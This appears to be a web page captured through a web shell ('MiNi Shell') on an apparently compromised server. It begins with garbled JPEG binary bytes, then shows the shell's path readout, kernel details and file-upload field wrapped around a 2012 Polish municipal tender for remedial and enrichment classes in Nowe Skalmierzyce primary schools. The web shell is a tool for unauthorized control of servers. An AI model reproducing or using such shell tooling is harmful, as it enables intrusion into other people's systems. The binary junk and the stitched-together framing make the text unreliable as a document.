JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/418222-N-2012.html

<p class="kh_header"><b>Nowe Skalmierzyce: Usługi edukacyjne w ramach projektu Szkoła dla każdego II</b><br>
<b>Numer ogłoszenia: 418222 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy i Miasta Nowe Skalmierzyce , ul. Ostrowska 8, 63-460 Nowe Skalmierzyce, woj. wielkopolskie, tel. 062 7621520, faks 062 7621593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.noweskalmierzyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne w ramach projektu Szkoła dla każdego II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu Szkoła dla każdego II w roku szkolnym 2012/13, dla których organem prowadzącym jest Gmina i Miasto Nowe Skalmierzyce. Projekt realizowany będzie w trybie systemowym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie  szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych  świadczonych  w systemie oświaty, Poddziałanie 9.1.2 -  Wyrównywanie szans edukacyjnych  uczniów  z grup  o utrudnionym dostępie  do edukacji  oraz zmniejszanie różnic w jakości  usług edukacyjnych
Klasyfikacja według kodów CPV: 80.10.00.00-5 - usługi szkolnictwa podstawowego
Szczegółowy opis przedmiotu zamówienia: 
Usługi będą realizowane w następujących szkołach i specjalnościach. Jednostka 1h używana jest - w przypadku zajęć specjalistycznych: korekcyjno - kompensacyjne, logopedycznych, socjoterapeutycznych i psychoedukacyjncyh 60 minut, pozostałe zajęcia 45 minut. Ilość dzieci w poszczególnych grupach będzie zgodna z Rozporządzeniem Ministra Edukacji Narodowej z dnia 17 listopada 2010. 

Zadanie I. Zajęcia  dla dzieci ze Szkole Podstawowej w Nowych Skalmierzycach
1.Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 270 godzin
a)  grupa I - kl. Ia -  30 h
b) grupa II - kl. Ib -  30 h
c) grupa III - kl. Ic - 30 h
d) grupa IV - kl. IIa - 30 h
e) grupa V -  kl. IIb - 30 h
f) grupa VI - kl. IIc - 30 h
g) grupa VII - kl. IIIa - 30 h
h) grupa VIII -kl. IIIb - 30 h
i) grupa IX - kl. IIIc- 30 h
2.Zajęcia dla dzieci z trudnościami w zdobywaniu wiedzy matematycznej - 270 godzin 
a)  grupa I - kl. Ia -  30 h
b) grupa II - kl. Ib -  30 h
c) grupa III - kl. Ic - 30 h
d) grupa IV - kl. IIa - 30 h
e) grupa V -  kl. IIb - 30 h
f) grupa VI - kl. IIc - 30 h
g) grupa VII - kl. IIIa - 30 h
h) grupa VIII -kl. IIIb - 30 h
i) grupa IX - kl. IIIc- 30 h
3.Zajęć logopedyczne dla dzieci z zaburzeniami rozwoju mowy 180 godzin
a)  grupa I - kl. I gr I - 30 h
b) grupa II - kl. I gr II - 30 h
c) grupa III - kl. II gr I -30 h
d) grupa IV - kl. II gr II  -30 h
e) grupa V - kl. III gr I - 30 h
f) grupa VI - kl. III gr II - 30 h
4.Zajęcia z gimnastyki korekcyjnej 180 godzin. 
a)  grupa I - kl. I gr I - 30 h
b) grupa II - kl. I gr II - 30 h
c) grupa III - kl. II gr I -30 h
d) grupa IV - kl. II gr II  -30 h
e) grupa V - kl. III gr I - 30 h
f) grupa VI - kl. III gr II - 30 h
5.Zajęcia matematyczno-przyrodnicze dla dzieci uzdolnionych-270 godzin. 
a)  grupa I - kl. Ia -  30 h
b) grupa II - kl. Ib -  30 h
c) grupa III - kl. Ic - 30 h
d) grupa IV - kl. IIa - 30 h
e) grupa V -  kl. IIb - 30 h
f) grupa VI - kl. IIc - 30 h
g) grupa VII - kl. IIIa - 30 h
h) grupa VIII -kl. IIIb - 30 h
i) grupa IX - kl. IIIc- 30 h
6.Zajęcia artystyczne dla dzieci uzdolnionych 270 godzin.
a)  grupa I - kl. Ia -  30 h
b) grupa II - kl. Ib -  30 h
c) grupa III - kl. Ic - 30 h
d) grupa IV - kl. IIa - 30 h
e) grupa V -  kl. IIb - 30 h
f) grupa VI - kl. IIc - 30 h
g) grupa VII - kl. IIIa - 30 h
h) grupa VIII -kl. IIIb - 30 h
i) grupa IX - kl. IIIc- 30 h

Zajęcia realizowane będą w godz. od 8.00 do 10.00  lub od 10.45 do 14.30 ( godziny uwarunkowane dowozami oraz planem zajęć szkolnych). 


Zadanie II. Zajęcia  dla dzieci ze Szkoły Podstawowej  w Skalmierzycach
1.Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 90 godzin. 
a)  grupa I - kl. I -30 h
b) grupa II - kl. II -30 h
c) grupa III - kl. III - 30 h
2.Zajęcia dla dzieci z trudnościami w zdobywaniu wiedzy matematycznej 120 godzin
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II - 30 h
c) grupa III - kl. III- 30 h
d) grupa IV - kl. II i III - 30 h
3.Zajęcia logopedyczne - 90 godzin.
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II - 30 h
c) grupa III - kl. III - 30 h
4.Zajęcia rozwijające ruchowe - 60 godzin
a)  grupa I - kl. I i II - 30 h
b) grupa II - kl. II i III - 30 h
5.Zajęcia socjoterapeutyczne - 60 godzin
a)  grupa I - kl. I i II - 30 h
b) grupa II - kl. II i III - 30 h
6. Zajęcia artystyczne dla dzieci uzdolnionych - 90 godzin
a)  grupa I -  kl. I -30 h
b) grupa II - kl. II - 30 h
c) grupa III - kl. III - 30 h
Zajęcia realizowane będą w godz. od 8.00 do 9.00 lub od 11.40 do 13.30 ( godziny uwarunkowane  planem zajęć szkolnych). 

Zadanie III.  Zajęcia  dla dzieci ze Szkoły Podstawowej  w Biskupicach
1.Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 60 godzin.
a)  grupa I - kl. I -  30 h
b) grupa II - kl. II i III -  30 h
2.Zajęcia dla dzieci z trudnościami matematycznymi - 60 godzin.
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II i III - 30 h
3.Zajęcia logopedyczne -   60 godzin.
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II i III - 30 h
4.Zajęcia z gimnastyki korekcyjnej - 60 godzin.
a)  grupa I - 60 h
5.Zajęcia matematyczno- przyrodnicze dla dzieci uzdolnionych- 30 godzin.
a)  grupa I - 30 h
6. Zajęcia artystyczne dla dzieci uzdolnionych - 30 godzin
a)  grupa I - 30 h

7. Zajęcia socjoterapeutyczne i psychoedukacyjne - 30 godzin
a)  grupa I - 30 h
8. Zajęcia rozwijające z języka angielskiego - 30 godzin
a)  grupa I - 30 h
Zajęcia realizowane będą w godz. od 8.00 do 9.00 lub od 11.45 do 14.00 ( godziny uwarunkowane  planem zajęć szkolnych). 


Zadanie IV. Zajęcia dla dzieci ze Szkoły Podstawowej w Ociążu
1.Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji  - 90 godzin. 
a)  grupa I - kl. I-  30 h
b) grupa II - kl. II - 30 h
c) grupa III - kl. III - 30 h
2. Zajęcia dla dzieci z trudnościami matematycznymi - 60 godzin
a)  grupa I - kl. II - 30 h
b) grupa II - kl. III - 30 h
3. Zajęcia przyrodniczo - matematyczne dla dzieci uzdolnionych - 60 godzin
a)  grupa I - kl. I  - 30 h
b) grupa II - kl. II, III - 30 h
4.Zajęcia logopedyczne - 150  godzin.
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II - 30 h
c) grupa III - kl. III - 30 h
d) grupa IV - kl. I, II - 30 h
e) grupa V - kl. II, III - 30 h
5.Zajęcia z gimnastyki korekcyjnej -  60 godzin.
a)  grupa I - kl. I, II -30 h
b) grupa II - kl. II, III - 30 h
6. Zajęcia artystyczne dla dzieci uzdolnionych - 60 godzin.
a)  grupa I - 30 h - zajęcia teatralne
b) grupa II - 30 h - zajęcia techniczno - plastyczne 

Zajęcia realizowane będą w godz. od 8.00 do 10.00 lub od 12.00 do 15.00  ( godziny uwarunkowane dowozami oraz planem zajęć szkolnych). 

Zadanie V. Zajęcia  dla dzieci ze Szkoły Podstawowej  w Gostyczynie
1.Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 60 godzin.
a)  grupa I - kl.  II - 30 h
b) grupa II - kl.  III - 30 h
2.Zajęcia dla dzieci z trudnościami matematycznymi  - 60 godzin.
a)  grupa I - kl. II - 30 h
b) grupa II - kl. III - 30 h
3. Zajęcia  matematyczno- przyrodnicze dla dzieci uzdolnionych - 90 godzin
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II -  30 h
c) grupa III - kl. III - 30 h
4.Zajęcia logopedyczne-  60 godzin
a)  grupa I - kl. I, II - 30 h
b) grupa II - kl. II, III - 30 h
5.Zajęcia z gimnastyki korekcyjnej - 30 godzin
a)  grupa I - 30 h
6. Zajęcia socjoterapeutyczne - 60 godzin
a)  grupa I - kl. I, II, III - 60 h
7. Zajęcia artystyczne dla dzieci uzdolnionych - 90 godzin
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II - 30 h
c) grupa III - kl. III - 30 h
Zajęcia realizowane będą w godz. od 7.10 do 8.10 lub od 12.00 do 15.30 ( godziny uwarunkowane dowozami oraz planem zajęć szkolnych). 

Zadanie VI. Zajęcia  dla dzieci ze Szkoły Podstawowej w Droszewie
1.Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji 90 godzin
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II - 30 h
c) grupa III - kl. III - 30 h
2.Zajęcia  dla dzieci z trudnościami w zdobywaniu wiedzy matematycznej- 60 godzin. 
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II i III 30 h
3.Zajęcia logopedyczne 90 godzin
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II - 30 h
c) grupa III - kl. III - 30 h
4.Zajęcia z gimnastyki korekcyjnej - 30 godzin
a)  grupa I - 30 h
5.Zajęcia psychoedukacyjne - 30 godzin.
a)  grupa I - 30 h
6.Zajęcia mat.- przyr. dla dzieci uzdolnionych -  30 godzin.
a)  grupa I - 30 h
7. Zajęcia artystyczne dla dzieci uzdolnionych - 30 godzin
a)  grupa I - 30 h
Zajęcia realizowane będą w godz. od 7.30 do 9.30 lub od 12.00 do 15.00 ( godziny uwarunkowane dowozami oraz planem zajęć szkolnych). 


Zadanie VII. Zajęcia  dla dzieci ze Szkoły Podstawowej w Kotowiecku
1.Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 60 godzin.
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II, III -30 h
2.Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 60 godzin 
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II, III - 30 h
3.Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 60 godzin
a)  grupa I - kl. I - 30 h
b) grupa II - kl. II, III - 30 h
4.Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy - 60 godzin
a)  grupa I - kl. I -30 h
b) grupa II - kl. II, III - 30 h
5.Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej - 30 godzin
a)  grupa I - 30 h
6.Zajęcia  matematyczno- przyrodnicze dla dzieci uzdolnionych - 30 godzin
a)  grupa I - 30 h
Zajęcia realizowane będą w godz.  11.50 do 15.00 ( godziny uwarunkowane dowozami oraz planem zajęć szkolnych)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 128.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i  osób zdolnych do wykonania zamówienia i wykażą.  
Wykonawcy poszczególnych zadań muszą spełniać następujące wymogi:
a) 
Zadanie I. 1a,b,c,d,e,f,g,h,i; 2a,b,c,d,e,f,g,h,i;  5 a,b,c,d,e,f,g,h,i 
Zadanie II. 1 a,b,c, 2 a,b,c, d, 
Zadanie III. 1 a, b , 2 a, b,  5 a, 
Zadanie IV. 1a,b,c; 2 a, b; 3a,b; 
Zadanie V. 1a,b; 2 a,b,; 3 a,b,c
Zadanie VI 1a,b,c, 2 a, b, 6a
Zadanie VII 1a,b; 2a,b; 6a
Wykonawca powinien posiadać stopień awansu zawodowego minimum mianowany, 
Wykształcenie wyższe z przygotowaniem pedagogicznym dające kwalifikacje do nauczania w klasach I - III szkoły podstawowej, 
Nauczyciel powinien być czynny zawodowo.
b)	Zadanie I.3 a, b, c,d,e,f
Zadanie II.3 a,b,c
Zadanie III.3 a, b
Zadanie IV. 4 a,b,c,d,e
Zadanie V. 4a,b
Zadanie VI. 3 a,b,c
Zadanie VII.3 a,b
Wykształcenie wyższe z przygotowaniem pedagogicznym 
Posiadać kwalifikacje do prowadzenia zajęć z zakresu logopedii i praktykę w tym zakresie
Nauczyciel powinien być czynny zawodowo, 
Lub być logopedą pracującym w poradni logopedycznej 
c)	Zadanie I.4 a, b, c,d,e,f
Zadanie II.4 a,b
Zadanie III.4a
Zadanie IV.5 a,b
Zadanie V. 5a
Zadanie VI.4a
Zadanie VII.4a,b

Wykonawca powinien posiadać stopień awansu zawodowego minimum kontraktowy, 
Wykształcenie wyższe z  przygotowaniem pedagogicznym
Posiadać kwalifikacje do prowadzenia zajęć z zakresu gimnastyki korekcyjno - kompensacyjnej i praktykę w tym zakresie,
Nauczyciel powinien być czynny zawodowo, 
d)	Zadanie II.5a,b
e)	Zadanie III.7a
Zadanie V.6 a,
Zadanie VI.5a
Zadanie VII.5a
Wykonawca powinien posiadać wykształcenie wyższe magisterskie z zakresu psychologii z przygotowaniem pedagogicznym, 
Doświadczenie w prowadzeniu zajęć i terapii z dziećmi. 

f)	Zadanie I.6a,b,c,d,e,f,gh,i
Zadanie II.6, a,b,c
Zadanie III.6a
Zadanie IV 6, a,b
Zadanie V 7a,b,c
Zadanie VI 7a

Wykonawca powinien posiadać stopień awansu zawodowego minimum mianowany, 
Wykształcenie wyższe magisterskie z  przygotowaniem pedagogicznym dające kwalifikacje do nauczania w klasach I - III szkoły podstawowej, 
Nauczyciel powinien być czynny zawodowo, 
g)
Zadanie III 8a
Wykonawca powinien posiadać stopień awansu zawodowego minimum kontraktowy, 
Wykształcenie wyższe magisterskie z  przygotowaniem pedagogicznym dające kwalifikacje do nauczania w klasach I - III szkoły podstawowej,
Kwalifikacje do nauczania języka angielskiego, 
Nauczyciel powinien być czynny zawodowo,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.noweskalmierzyce.pl/bip/przetargi/2012/ogloszenia-o-przetargu2012.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Nowe Skalmierzyce, ul. Ostrowska 8, 63-460 Nowe Skalmierzyce, pokój 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2012 godzina 10:00, miejsce: Urząd Gminy i Miasta Nowe Skalmierzyce, ul. Ostrowska 8, 63-460 Nowe Skalmierzyce, pokój 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Szkoła dla każdego II współfinansowany jest ze środków Europejskiego Funduszu Społecznego, realizowany  w trybie systemowym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie  szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych  świadczonych  w systemie oświaty, Poddziałanie 9.1.2 -  Wyrównywanie szans edukacyjnych  uczniów  z grup  o utrudnionym dostępie  do edukacji  oraz zmniejszanie różnic w jakości  usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com